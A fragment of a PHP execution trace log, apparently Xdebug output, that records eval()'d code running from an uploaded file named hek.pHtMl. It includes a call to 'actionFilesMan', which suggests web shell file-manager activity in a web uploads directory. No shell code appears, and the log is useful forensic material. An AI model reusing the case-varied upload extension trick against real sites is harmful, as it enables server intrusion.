: eval()'d code 268 1 'actionFilesMan' 6 239 1 0.020714 1320248 6 239 R TRUE 6 240 0 0.020727 1320464 htmlspecialchars 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function(1) : eval()'d code 270 1 '/var/www/html/uploads/' 6 240 1 0.020743 1320656 6 240 R '/var/www/html/uploads/' 5 231 1 0.020763 1318928 4 34 1 0.020774 1311664 3 9 1 0.020785 1311664 2 6 1 0.020803 1145416 1 3 1 0.020812 1145416 0.020861 1053088 TRACE END [2023-02-12 19:27:53.721465]